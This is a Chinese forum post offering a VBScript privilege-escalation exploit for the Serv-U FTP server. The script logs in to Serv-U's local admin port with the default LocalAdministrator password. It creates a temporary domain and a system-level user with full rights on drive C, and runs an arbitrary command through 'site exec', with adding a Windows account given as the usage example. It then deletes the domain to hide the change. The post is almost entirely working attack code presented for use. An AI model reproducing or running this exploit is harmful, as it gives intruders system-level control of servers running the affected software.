返回列表 发帖
坏的刚刚好 该用户已被删除
楼主 跳转到 » 倒序看帖
打印
tT
坏的刚刚好发表于 2005-12-9 20:32 | 只看该作者

Serv-U提权脚本代码 dugu的简单生活

';By dugu
';thanks Crackme
';usage:wscript su.vbs "net user aa aa /add"
on error resume next
Dim servuManagePort
Dim servuManageName
Dim servuManagePass
Dim command
servuManagePort = 43958 ';修改为主机Serv-U的管理端口
servuManageName = "LocalAdministrator" ';管理用户名
servuManagePass = "#l@$ak#.lk;0@P" ';管理密码
command = LCase(WScript.Arguments(0)) ';在第一个参数中设置你要运行的命令
Dim revdata
Dim sendata
Set sock=createobject("MSWinsock.Winsock")
Sock.protocol=0
Sock.connect "127.0.0.1",servuManagePort
WScript.sleep 10
Sendata="USER "&servuManageName& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="PASS "&servuManagePass& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="SITE MAINTENANCE"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-SETDOMAIN"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-Domain=hhxx|0.0.0.0|222|-1|1|0 "& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-DynDNSEnable=0 "& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata=" DynIPName="& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-SETUSERSETUP"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-IP=0.0.0.0"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-PortNo=222"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-User=hhxxttxs"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-Password=hhxxttxs"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-HomeDir=c:\"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-Maintenance=System"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-Ratios=None"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata=" Access=c:\|RWAMELCDP"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-GETUSERSETUP"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
sock.close
WScript.sleep 10
Set sock2=createobject("MSWinsock.Winsock")
Sock2.protocol=0
Sock2.connect "127.0.0.1",222
WScript.sleep 10
Sendata="USER hhxxttxs"& chr(10) &chr(13)
Sock2.senddata Sendata
WScript.sleep 10
Sendata="PASS hhxxttxs"& chr(10) &chr(13)
Sock2.senddata Sendata
WScript.sleep 10
Sendata="site exec "&command&chr(10) &chr(13)
Sock2.senddata Sendata
WScript.sleep 10
Sock2.close
WScript.sleep 10
Set sock3=createobject("MSWinsock.Winsock")
Sock3.protocol=0
Sock3.connect "127.0.0.1",servuManagePort
WScript.sleep 10
Sendata="USER "&servuManageName& chr(10) &chr(13)
Sock3.senddata Sendata
WScript.sleep 10
Sendata="PASS "&servuManagePass& chr(10) &chr(13)
Sock3.senddata Sendata
WScript.sleep 10
Sendata="SITE MAINTENANCE"& chr(10) &chr(13)
Sock3.senddata Sendata
WScript.sleep 10
Sendata="-DELETEDOMAIN"& chr(10) &chr(13)
Sock3.senddata Sendata
WScript.sleep 10
Sendata="-IP=0.0.0.0"& chr(10) &chr(13)
Sock3.senddata Sendata
WScript.sleep 10
Sendata=" PortNo=222"& chr(10) &chr(13)
Sock3.senddata Sendata
WScript.sleep 10
Sendata="-GETDOMAIN"& chr(10) &chr(13)
Sock3.senddata Sendata
WScript.sleep 10
Sock3.close
收藏 分享

返回列表 回复 发帖